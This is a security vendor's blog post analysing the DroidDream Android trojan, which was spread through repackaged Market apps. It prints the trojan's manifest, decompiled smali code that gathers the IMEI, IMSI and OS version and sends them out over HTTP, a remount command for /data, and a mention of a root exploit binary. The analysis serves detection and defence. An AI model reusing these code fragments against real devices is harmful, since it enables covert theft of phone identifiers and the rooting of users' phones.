A latest Android Trojan named "DroidDream" was discovered by mobile security company Lookout Inc. today. This trojan pirates legal application and repacks it as a new one and the malware writer(s) published in Google's offical Android market. More than 50 applications were suffered such attack and now illegally modified ones were pulled out from the market.

     With the collection of published applications in the Google market, other local markets and websites, we did a brief and quick analysis on the samples we have. More detailed information will be updated as the investigation goes on.

     At first, the infected application didn't request too much privilege so the user may not notice any abnormal. For example,

<!-- Only a few privileges are required -->
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.INTERNET" />

        <activity android:name="com.android.root.main
                <!-- Intercept the launch activity -->
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
        <service android:name="com.android.root.Setting" android:process=":remote" />
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2" /> 

     Unpack the package, we can found some additional codes were added.


adbRoot$1.smali  adbRoot.smali  AlarmReceiver$1.smali  AlarmReceiver.smali  main.smali  Setting$1.smali  Setting$2.smali  Setting.smali  udevRoot.smali


     It utilizes JNI, so make the analysis a bit harder.

Exec.smali -> Exec.java :
package jackpal.androidterm;

import java.io.FileDescriptor;

public class Exec
    System.loadLibrary("androidterm"); //it calls JNI library "libandroidterm.so"

The collected personal data is stored in local Setting.smali,
 784     .line 306
 785     .local v1, fm:Ljava/util/Formatter;
 786     const/4 v2, 0x5
 788     new-array v2, v2, [Ljava/lang/Object;
 790     const/4 v3, 0x0
 792     const-string v4, "502"
 794     aput-object v4, v2, v3
 796     const/4 v3, 0x1
 798     const-string v4, "10028"           //trojan version
 800     aput-object v4, v2, v3
 802     const/4 v3, 0x2
 803     //collect mobile IMEI
 804     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMEI(Landroid/content/Context;)Ljava/lang/String;
 806     move-result-object v4
 808     aput-object v4, v2, v3
 810     const/4 v3, 0x3
 811     //collect mobile IMSI
 812     invoke-static {p1}, Lcom/android/root/adbRoot;->getIMSI(Landroid/content/Context;)Ljava/lang/String;
 814     move-result-object v4
 816     aput-object v4, v2, v3
 818     const/4 v3, 0x4
 820     new-instance v4, Ljava/lang/StringBuilder;
 822     sget-object v5, Landroid/os/Build;->DEVICE:Ljava/lang/String;
 824     invoke-static {v5}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
 826     move-result-object v5
 828     invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
 830     const-string v5, ":"
 832     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
 834     move-result-object v4
 836     sget v5, Landroid/os/Build$VERSION;->SDK_INT:I            //collect mobile android system version
 838     invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
 840     move-result-object v4
 842     invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
 844     move-result-object v4
 846     aput-object v4, v2, v3
 848     invoke-virtual {v1, v0, v2}, Ljava/util/Formatter;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/util/Formatter;
 855     .end local v0           #data:Ljava/lang/String;
 856     invoke-virtual {v0}, Ljava/lang/String;->getBytes()[B
 858     move-result-object v1
 860     .line 308
 861     .local v1, buff:[B
 862     invoke-static {v1}, Lcom/android/root/adbRoot;->crypt([B)V    //Should have encrypted, but local backup didn't
 864     .line 311
 865     new-instance v0, Ljava/net/URL;
 867     invoke-direct {v0, p0}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
 869     .line 312
 870     .local v0, aURL:Ljava/net/URL;
 871     invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
 873     move-result-object p0
 875     .end local p0
 876     check-cast p0, Ljava/net/HttpURLConnection;
 878     .line 313
 879     .local p0, aConnection:Ljava/net/HttpURLConnection;
 880     const/4 v0, 0x1
 882     invoke-virtual {p0, v0}, Ljava/net/HttpURLConnection;->setDoOutput(Z)V

 989     .line 344
 990     const-string p0, "pref_config_setting"  
            //write log into data/data/droiddream/com.droiddream.lovePositions/shared_prefs/pref_config_setting.xml
 992     const/4 v0, 0x0
 994     invoke-virtual {p1, p0, v0}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
 996     .end local v0           #bao:Ljava/io/ByteArrayOutputStream;
 997     move-result-object p0
 999     invoke-interface {p0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
1001     move-result-object p0
1003     .line 345
1004     .local p0, editor:Landroid/content/SharedPreferences$Editor;
1005     const-string p1, "done"

    From the LogCat, it tries to connect to http://www.umeng.com/app_logs, whois information about umeng.com points to Bejing registrant. The website is an statistic counting service for applications. Seems harmless at first glance.

    It will collect IMEI, IMSI, SDK version, Android OS version, language and etc, and stores to /data/data/droiddream/com.droiddream.lovePositions/shared_prefs/mobclick_agent_header_com.droiddream.lovePositions.xml

    In /data/data/droiddream/com.droiddream.lovePositions/files:

remount_data.sh  remount_sys_ro.sh  remount_sys_rw.sh

The remount_xxx.sh attempts to mount its space to /data, and let itself can access the stored files generated by other applications. The command is similiar to the below.

mount -o remount,rw,nosuid,nodev -t yaffs2 /dev/block/mtdblock1 /data

     It also collects the information under /proc, and stores to /data/data/droiddream/com.droiddream.lovePositions/files/proc

     The snippet of /data/data/droiddream/com.droiddream.lovePositions/files/rageagainstthecage was shown as below figure.

      Check the fie attribute and type of rageagainstthecage, we found: 

    Obviously it's an exectuable file.

    Inside it, the /proc/%d/cmdline is the same way as the code in (http://hiapk.com/viewthread.php?action=printable&tid=585198), so it should be some attempt to root the system. However, we are not sure the intention to root and the actions after root, there are many codes need further analysis. Stay tuned!

By AegisLab.

Analyzer: Zod Lin